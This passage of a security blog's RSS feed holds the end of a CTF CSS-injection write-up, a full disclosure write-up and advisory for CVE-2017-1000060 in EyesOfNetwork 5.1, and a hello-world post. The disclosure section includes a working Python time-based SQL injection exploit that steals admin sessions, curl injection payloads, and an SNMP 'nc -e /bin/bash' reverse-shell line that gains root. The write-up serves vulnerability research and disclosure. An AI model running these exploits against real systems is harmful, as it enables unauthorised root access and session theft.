80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:45:39 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d30;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:48:12 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:48:47 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:49:08 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:49:37 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:49:57 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s30;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:50:09 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s3c0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:50:22 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s3cr3t0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:51:12 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s3cr3ts0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span>
80.252.154.43 - - <span class="o">[</span>27/Aug/2017:04:51:24 +0200] <span class="s2">"GET /?a=h4ck1t{c</span><span class="nv">$$</span><span class="s2">_1nj3ct10n_h1d3s_s3cr3ts}0;} HTTP/1.1"</span> 302 5 <span class="s2">"http://tasks.ctf.com.ua:13373/profile.php"</span> <span class="s2">"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"</span></code></pre></figure>
<h3 id="bonus">Bonus</h3>
<p>After solving the challenge, a friend I did the CTF with told me there could be a faster solution than bruteforcing the characters ourselves, even on unreliable servers. It is possible to simply create a lot of selectors, like <code class="highlighter-rouge">h4ck1t{[a-z0-9]</code> and by sending one request, the server will answer us with one character.</p>
</description>
<pubDate>Sun, 27 Aug 2017 00:00:00 +0200</pubDate>
<link>/ctf/web/2017/08/27/ctf-writeup-hackit-2017-web200.html</link>
<guid isPermaLink="true">/ctf/web/2017/08/27/ctf-writeup-hackit-2017-web200.html</guid>
</item>
<item>
<title>From unauthenticated to root on a supervision appliance</title>
<description><p>On a recent penetration test, I had to opportunity to test the security of an open-source supervision appliance called <code class="highlighter-rouge">EyesOfNetwork</code>. Multiple vulnerabilities have been found and will be reported in this post.</p>
<h3 id="what-is-eyesofnetwork">What is EyesOfNetwork?</h3>
<p>From the official website:</p>
<blockquote>
<p>EyesOfNetwork (“EON”) is the OpenSource solution combining a pragmatic usage of ITIL processes and a technological interface allowing their workaday application. EyesOfNetwork Supervision is the first brick of a range of products targeting to assist IT managment and gouvernance. EyesOfNetwork Supervision provides event management, availability, problems and capacity.</p>
</blockquote>
<p>Basically, it is a French supervision solution combining Nagios, Cacti as well as other tools with some of them being hand-made to create a complete appliance to monitor your infrastructure. The solution offers a web interface called <code class="highlighter-rouge">Eonweb</code>.</p>
<h3 id="preparation">Preparation</h3>
<p>For the next tests, we will download the latest iso available on <a href="https://www.eyesofnetwork.com/">https://www.eyesofnetwork.com/</a>. The version downloaded was EyesOfNetwork <code class="highlighter-rouge">5.1</code> and represented the latest version available of the software.</p>
<p>Most of the vulnerabilities found during the assessments and presented in this post have been identified on lower versions as well.</p>
<p>After a default install, if we launch nmap to scan TCP ports, here is the list of ports we find:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">nmap 192.168.1.161 -p- <span class="c"># The IP address chosen for EON is 192.168.1.161</span>
Starting Nmap 7.40 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2017-03-xx xx:xx CEST
Nmap scan report <span class="k">for </span>192.168.1.161
Host is up <span class="o">(</span>0.00037s latency<span class="o">)</span>.
Not shown: 65530 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http <span class="c"># Used by Eonweb (web interface)</span>
443/tcp open https <span class="c"># Used by Eonweb (web interface)</span>
2403/tcp open taskmaster2000
3306/tcp open mysql
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>0.69 seconds</code></pre></figure>
<p>Our goal being a quick way into the system, we’ll search for the low hanging fruit by searching for web vulnerabilities on Eonweb. SSH being difficult to attack due to the possibility of an administrator to change the user accounts passwords at the iso installation and MySQL blocking non-localhost connections.</p>
<h3 id="quick-and-dirty-unauthenticated-sql-injection">Quick and dirty: Unauthenticated SQL injection</h3>
<p>No authentication bypass has been found even if SQL errors could be generated by logging in using a backslash character at the end of the username. A SQL injection has been found, however, inside the <a href="https://github.com/EyesOfNetworkCommunity/eonweb/blob/8140aace9493e497e7ca69733079179f62beef7a/logout.php"><em>logout.php</em></a> file, at line 28.</p>
<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
<span class="c1">//logout.php
</span><span class="o">...</span>
<span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"session_id"</span><span class="p">]))</span> <span class="p">{</span>
<span class="nv">$sessid</span><span class="o">=</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s2">"session_id"</span><span class="p">];</span>
<span class="nx">sqlrequest</span><span class="p">(</span><span class="nv">$database_eonweb</span><span class="p">,</span><span class="s2">"DELETE FROM sessions where session_id='</span><span class="nv">$sessid</span><span class="s2">'"</span><span class="p">);</span> <span class="c1">// Vulnerable
</span><span class="p">}</span>
<span class="o">...</span>
<span class="cp">?&gt;</span></code></pre></figure>
<p>Obviously, we can control the <code class="highlighter-rouge">session_id</code> cookie because it is not set up inside a session and because of the fact the server doesn’t filter quotes by default.</p>
<p>The injection being inside a <code class="highlighter-rouge">DELETE</code> statement, we have two options: either we exploit it using a blind-based technique by setting up arbitrary sessions and checking which session get deleted (useful for example in the case of a privilege escalation exploit if we have an unprivileged account) <strong>or</strong> we could exploit it using a time-based attack.</p>
<p>From the point of view of an attacker, we’ll take the second option as we do not have credentials on the application.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="gp">rioru@zhsk:/tmp$ </span><span class="nb">time </span>curl -s -o /dev/null https://192.168.1.161/logout.php --insecure -b <span class="s2">"session_id=' OR BENCHMARK(1,1)=1 -- -"</span>
real 0m0,091s
user 0m0,064s
sys 0m0,012s
<span class="gp">rioru@zhsk:/tmp$ </span><span class="nb">time </span>curl -s -o /dev/null https://192.168.1.161/logout.php --insecure -b <span class="s2">"session_id=' OR BENCHMARK(100000000,1)=1 -- -"</span>
real 0m1,778s <span class="c"># We can see there that the response time is considerably longer</span>
user 0m0,068s
sys 0m0,008s</code></pre></figure>
<p>The function <code class="highlighter-rouge">SLEEP</code> is not always usable in a <code class="highlighter-rouge">DELETE FROM</code> statement, that’s why <code class="highlighter-rouge">BENCHMARK</code> has been used in this example. <code class="highlighter-rouge">SLEEP</code> is indeed usable only when a table is not empty, we’ll use <code class="highlighter-rouge">SLEEP</code> for our proof of concept as we will need to try to recover the sessions table anyway, but in the final exploit, we’ll have to handle the two possibilities.</p>
<p>What’s particularly interesting is the sessions’ creation:</p>
<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
<span class="c1">//login.php
</span><span class="o">...</span>
<span class="c1">// Create session ID
</span><span class="nv">$sessid</span><span class="o">=</span><span class="nb">rand</span><span class="p">();</span>
<span class="nx">sqlrequest</span><span class="p">(</span><span class="nv">$database_eonweb</span><span class="p">,</span><span class="s2">"INSERT INTO sessions (session_id,user_id) VALUES ('</span><span class="nv">$sessid</span><span class="s2">','</span><span class="nv">$usrid</span><span class="s2">')"</span><span class="p">);</span>
<span class="o">...</span>
<span class="cp">?&gt;</span></code></pre></figure>
<p>The monitoring solution is creating their sessions using only <code class="highlighter-rouge">rand()</code> as the session_id, meaning that even if we are forced to do our exploitation via a time-based technique, the session_id could be found in under 11 or 12 seconds with a simple brute force character by character if we set-up a <code class="highlighter-rouge">SLEEP</code> time of 1 second.</p>
<p>What to keep in mind:</p>
<ul>
<li><code class="highlighter-rouge">DELETE</code> statements can’t do subqueries affecting their own table.</li>
<li>The target table doesn’t use a proper index column, this can lead to confusion when using substring with <code class="highlighter-rouge">LIMIT</code>, even when <code class="highlighter-rouge">ORDER BY</code> is used.</li>
</ul>
<p>Here is the exploitation scenario:</p>
<ul>
<li>Doing an initial request to get a value representing the lag between the target and our machine.</li>
<li>Delete all the non-admin (user_id != 1) sessions.</li>
<li>Getting the number of entries by doing <code class="highlighter-rouge">OR sleep(1)=1</code>. For each record, the server will sleep one second, by doing so we will able to either: delete <code class="highlighter-rouge">&lt;entries count&gt; - 1</code> or <code class="highlighter-rouge">sleep(1 / &lt;entries count&gt;)</code> to avoid entries confusion and get a faster exploitation. We will choose the first option; the second has been proven to be unstable after some tests.</li>
<li>Delete all sessions but one.</li>
<li>Now that we have only one admin sessions in the table, it will be easy to recover it.</li>
</ul>
<p>Proof of concept:</p>
<noscript><pre>import time
from requests import *
from requests.packages.urllib3.exceptions import InsecureRequestWarning
packages.urllib3.disable_warnings(InsecureRequestWarning)
url = &quot;https://192.168.1.161&quot;
print &quot;[!] Proof of Concept for the Unauthenticated SQL Injection in EyesOfNetwork 5.1 (DELETE statement) - Rioru (@ddxhunter)&quot;
def getTime(page, cookie=&quot;&quot;):
start = time.time()
get(url+page, verify=False, cookies=dict(session_id=cookie))
end = time.time()
return round(end - start, 2)
# Getting an initial response time to base our next requests around it
initial_time = getTime(&quot;/&quot;) - 0.01
getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR user_id!=1 -- -&quot;)
print &quot;[+] The initial request time on %s is %f, getting the number of entries, it could take a while...&quot; % (url, initial_time)
sleep1_time = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR SLEEP(1)=1337 -- -&quot;)
if (sleep1_time - initial_time &gt;= 1):
count = round(sleep1_time)
print &quot;[+] Found %d entries in the [sessions] table, deleting every sessions except one&quot; % count
else:
print &quot;[-] The table [sessions] seems empty&quot;
exit()
for i in range(int(count) - 1):
getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR 1=1 LIMIT 1 -- -&quot;)
# Get the length
session_length = 0
for i in range(12):
execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR (SELECT CASE WHEN ((SELECT LENGTH(session_id) FROM DUAL ORDER BY session_id LIMIT 1)=&quot;+ str(i+1) +&quot;) THEN SLEEP(1) ELSE 1 END)=1337 -- -&quot;)
if (round(execTime - initial_time) &gt;= 1):
session_length = i+1
break
if (session_length == 0):
print &quot;[-] Couldn&#39;t find the length of the session_id&quot;
exit()
print &quot;[+] Found an admin session length: %d, getting the session_id&quot; % session_length
# Get the session_id
print &quot;[+] session_id: &quot;,
session_id = &quot;&quot;
for i in range(session_length):
for j in range(10):
execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR (SELECT CASE WHEN (SUBSTRING((SELECT session_id FROM DUAL ORDER BY session_id LIMIT 1),&quot;+ str(i+1) +&quot;,1)=&quot;+ str(j) +&quot;) THEN SLEEP(1) ELSE 1 END)=1337 -- -&quot;)
if (round(execTime - initial_time) &gt;= 1):
session_id += str(j)
print str(j),
break
print &quot;\n[+] final session_id: [%s]&quot; % session_id
# Get the username
execTime = getTime(&quot;/logout.php&quot;, &quot;rioru&#39; OR (SELECT CASE WHEN ((SELECT user_name FROM users WHERE user_id=1)=&#39;admin&#39;) THEN SLEEP(1) ELSE 1 END)=1337 -- -&quot;)
if (round(execTime - initial_time) &gt;= 1):
print &quot;[+] Username is [admin]&quot;
else:
print &quot;[-] Username is not admin, brute force necessary&quot;
print &quot;[+] End of the PoC use these cookies to authenticate to Eonweb:&quot;
print &quot;session_id: %s;&quot; % session_id
print &quot;user_name: %s;&quot; % &quot;admin&quot;
print &quot;user_id: %d;&quot; % 1
print &quot;user_limitation: %d;&quot; % 0
print &quot;group_id: %d;&quot; % 1
</pre></noscript>
<script src="https://gist.github.com/rioru/105fb626b5ce046d8f050032da24ad2d.js"> </script>
<p>And here it is in action:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="gp">rioru@zhsk:~/perso$ </span>python poc_eon_5.1.py
<span class="o">[</span>!] Proof of Concept <span class="k">for </span>the Unauthenticated SQL Injection <span class="k">in </span>EyesOfNetwork 5.1 <span class="o">(</span>DELETE statement<span class="o">)</span> - Rioru <span class="o">(</span>@ddxhunter<span class="o">)</span>
<span class="o">[</span>+] The initial request <span class="nb">time </span>on https://192.168.1.161 is 0.020000, getting the number of entries, it could take a <span class="k">while</span>...
<span class="o">[</span>+] Found 379 entries <span class="k">in </span>the <span class="o">[</span>sessions] table, deleting every sessions except one
<span class="o">[</span>+] Found an admin session length: 9, getting the session_id
<span class="o">[</span>+] session_id: 3 5 3 8 9 8 3 2 7
<span class="o">[</span>+] final session_id: <span class="o">[</span>353898327]
<span class="o">[</span>+] Username is <span class="o">[</span>admin]
<span class="o">[</span>+] End of the PoC use these cookies to authenticate to Eonweb:
session_id: 353898327;
user_name: admin;
user_id: 1;
user_limitation: 0;
group_id: 1;</code></pre></figure>
<p>Using these cookies in a browser or with curl, we are correctly authenticated on Eonweb with the <code class="highlighter-rouge">admin</code> account.</p>
<p><img src="/assets/media/eonweb_auth.png" alt="Authenticated on eonweb" /></p>
<p>From there, we can access all the monitoring tools available in EON (Nagios, Cacti, Thrunk, …).</p>
<h3 id="go-for-the-kill-privilege-escalation-using-snmp">Go for the kill: Privilege escalation using snmp</h3>
<p>Now that we have access to the web interface, we will try to elevate our privileges searching for an RCE. I found a particularly interesting way to perform a root-privileged remote code execution on the appliance using SNMP.</p>
<p>Let’s see the privileges of the process running snmpd and its configuration:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>root@localhost ~]# ps aux | grep snmpd
root 8297 0.0 0.6 223424 12448 ? Ss mars27 1:29 /usr/sbin/snmpd -LS0-6d -f
root 24404 0.0 0.0 112648 968 pts/0 R+ 06:16 0:00 grep --color<span class="o">=</span>auto snmpd</code></pre></figure>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>root@localhost snmp]# <span class="nb">pwd</span>
/etc/snmp
<span class="o">[</span>root@localhost snmp]# ls -al
total 36
drwxr-xr-x. 2 root root 46 27 mars 14:07 .
drwxr-xr-x. 85 root root 8192 27 mars 12:14 ..
-rw-rw-rw-. 1 root root 18955 27 mars 14:07 snmpd.conf
-rw-rw-rw-. 1 root root 129 27 mars 14:07 snmptrapd.conf</code></pre></figure>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">[</span>root@localhost snmp]# cat /etc/sudoers
...
<span class="c"># eonweb</span>
apache <span class="nv">ALL</span><span class="o">=</span>NOPASSWD:/bin/systemctl <span class="k">*</span> snmptt,/bin/systemctl <span class="k">*</span> snmptrapd,/bin/systemctl <span class="k">*</span> snmpd,/bin/systemctl <span class="k">*</span> nagios,/bin/systemctl <span class="k">*</span> gedd,/usr/bin/nmap</code></pre></figure>
<p>So, by default, anybody could edit the SNMP configuration, reload the server using sudo and the process will be run as root. Fortunately, we do not even need to find an RCE to perform these actions as they are available in the web interface Eonweb.</p>
<p>At <code class="highlighter-rouge">/module/admin_process/</code> we are able to restart/reload the different processes in EyesOfNetwork:</p>
<p><img src="/assets/media/eonweb_process.png" alt="Eonweb process management" /></p>
<p>And, even if I wasn’t able to find it in the interface, an administrator can edit directly the SNMP configuration file, going to <code class="highlighter-rouge">/module/admin_files/?file=snmpconf</code>.</p>
<p><img src="/assets/media/eonweb_snmpconf.png" alt="Eonweb snmpconf" /></p>
<p>What’s so interesting about SNMP? It is possible to execute shell commands by setting a specific instruction inside it and call for the correct OID.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">// snmpconf
...
<span class="nb">exec </span>rioru /bin/nc -e /bin/bash &lt;reverse ip&gt; &lt;port&gt;
...</code></pre></figure>
<p>Now we have to access the SNMPd service either with <code class="highlighter-rouge">snmpwalk</code> directly if 161/udp is open and do <code class="highlighter-rouge">snmpwalk -v 1 &lt;EON ip&gt; -c &lt;community&gt; .1.3.6.1.4.1.2021.8</code> <strong>or</strong> we could, once again, use the tools available in Eonweb to trigger the command execution, for example if there is a firewall present between EON and our machine blocking SNMP requests.</p>
<p>At <code class="highlighter-rouge">/module/tool_all/</code>, a snmpwalk tool is available, by default it is recovering all the MIB, but since the host is the last argument from the command line, we can set the host to <code class="highlighter-rouge">&lt;host&gt; &lt;OID&gt;</code> and get our connect-back.</p>
<p><img src="/assets/media/eonweb_snmpwalk.png" alt="Eonweb snmpwalk" /></p>
<p>And in our connect-back shell we previously set-up:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="gp">rioru@zhsk:~/perso$ </span>nc -l -p 4444 -v
listening on <span class="o">[</span>any] 4444 ...
192.168.1.161: inverse host lookup failed: Unknown host
connect to <span class="o">[</span>192.168.1.27] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>192.168.1.161] 54388
id
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">context</span><span class="o">=</span>system_u:system_r:snmpd_t:s0
ifconfig
ens160: <span class="nv">flags</span><span class="o">=</span>4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt; mtu 1500
inet 192.168.1.161 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::70d7:a7c2:630f:681f prefixlen 64 scopeid 0x20&lt;link&gt;
ether 00:0c:29:dc:69:9a txqueuelen 1000 <span class="o">(</span>Ethernet<span class="o">)</span>
RX packets 664160 bytes 59288971 <span class="o">(</span>56.5 MiB<span class="o">)</span>
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 185658 bytes 101831097 <span class="o">(</span>97.1 MiB<span class="o">)</span>
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: <span class="nv">flags</span><span class="o">=</span>73&lt;UP,LOOPBACK,RUNNING&gt; mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10&lt;host&gt;
loop txqueuelen 1 <span class="o">(</span>Local Loopback<span class="o">)</span>
RX packets 256506 bytes 31487186 <span class="o">(</span>30.0 MiB<span class="o">)</span>
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 256506 bytes 31487186 <span class="o">(</span>30.0 MiB<span class="o">)</span>
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</code></pre></figure>
<p>Final privilege escalation scenario:</p>
<ul>
<li>Edit the snmpconf via <code class="highlighter-rouge">admin_files</code> and search for the correct community</li>
<li>Reload the service via <code class="highlighter-rouge">admin_process</code></li>
<li>Call the correct snmp OID either if SNMP is accessible or using tools from Eonweb in <code class="highlighter-rouge">tool_all</code></li>
</ul>
<h3 id="automating-the-attack">Automating the attack</h3>
<p>Now that we have all these elements, a complete scenario is possible:</p>
<ul>
<li>Exploiting the Unauthenticated SQL Injection to recover either: sessions or accounts (password are stored in simple md5).</li>
<li>Authenticate on the application</li>
<li>Recover the SNMP community</li>
<li>Edit the snmpd config files to add a malicious command</li>
<li>Execute the command using snmpwalk (either remotely or locally using the tools available in eonweb)</li>
<li>We have our root-privileged execution :).</li>
</ul>
<h3 id="timeline">Timeline</h3>
<ul>
<li>01st February 2017 - Initial Discovery</li>
<li>14th March 2017 - Public disclosure of an authenticated SQL injection and an RCE in Eonweb by Sysdream</li>
<li>27th March 2017 - First contact with the vendor</li>
<li>28th March 2017 - Created the proof of concept for the exploit</li>
<li>28th March 2017 - CVE request to DWF</li>
<li>29th March 2017 - Acknowledgement of the vendor</li>
<li>07th May 2017 - Got assigned a CVE ID via DWF (CVE-2017-1000060)</li>
</ul>
<h3 id="final-advisory">Final Advisory</h3>
<div class="highlighter-rouge"><pre class="highlight"><code>Title:
======
EyesOfNetwork (EON) 5.1 Unauthenticated SQL Injection in eonweb leading to remote root
Author:
=======
Dany Bach [@ddxhunter, rioru.github.io]
CVE-ID:
=======
CVE-2017-1000060
OVE-ID:
=======
OVE-20170328-0001
Risk Information:
=================
CVSS Base Score 10.0
CVSS Vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:U/RC:C
CVSS Temporal Score 9.7
Overall CVSS Score 9.7
Timeline:
=========
2017-02-01 - Initial Discovery
2017-03-14 - Public disclosure of an authenticated SQL injection and an RCE in Eonweb by Sysdream
2017-03-27 - First contact with the vendor
2017-03-28 - Created the proof of concept for the exploit
2017-03-28 - CVE request to DWF
2017-03-28 - Acknowledgement of the vendor
2017-05-03 - Got assigned a CVE ID via DWF (CVE-2017-1000060)
Status:
=======
Published
Affected Products:
==================
EyesOfNetwork ("EON") 5.1 and older
Vendor Homepage:
================
https://www.eyesofnetwork.com/?lang=en
Details:
========
By exploiting an unauthenticated SQL injection in Eonweb (logout.php), it is possible to gain remote root access to the server using a lack of proper permissions in SNMPd after an authentication using the sessions table.
Vulnerable file:
================
logout.php, Line 28
...
if(isset($_COOKIE["session_id"])) {
$sessid=$_COOKIE["session_id"];
sqlrequest($database_eonweb,"DELETE FROM sessions where session_id='$sessid'"); // Vulnerable
}
...
Proof of Concept:
=================
https://gist.github.com/rioru/105fb626b5ce046d8f050032da24ad2d
Fix:
====
</code></pre>
</div>
</description>
<pubDate>Tue, 28 Mar 2017 00:00:00 +0200</pubDate>
<link>/pentest/web/2017/03/28/from-unauthenticated-to-root-supervision.html</link>
<guid isPermaLink="true">/pentest/web/2017/03/28/from-unauthenticated-to-root-supervision.html</guid>
</item>
<item>
<title>Mandatory Hello World</title>
<description><p>Greetings,</p>
<p>My name is <code class="highlighter-rouge">Dany</code>, even if you can call me <code class="highlighter-rouge">Rioru</code>.</p>
<p>I finally decided to launch my blog on <code class="highlighter-rouge">github</code> using <code class="highlighter-rouge">Jekyll</code> to generate my pages. I used to have a <a href="https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/"><strong>blog</strong></a> but since I created it when I was 17, I decided it was better to start once again from scratch.</p>
<p>This blog will mostly talk about computer security, generally from the point of view of a penetration tester. I’ll share my tips, tricks and thoughts here.</p>
<figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span>
<span class="k">echo</span> <span class="s2">"Hello World"</span><span class="p">;</span>
<span class="cp">?&gt;</span></code></pre></figure>
<p>See you around.
Cheers.</p>
</description>
<pubDate>Tue, 07 Mar 2017 00:00:00 +0100</pubDate>
<link>/general/2017/03/07/mandatory-hello-world.html</link>
<guid isPermaLink="true">/general/2017/03/07/mandatory-hello-world.html</guid>
</item>
</channel>
</rss>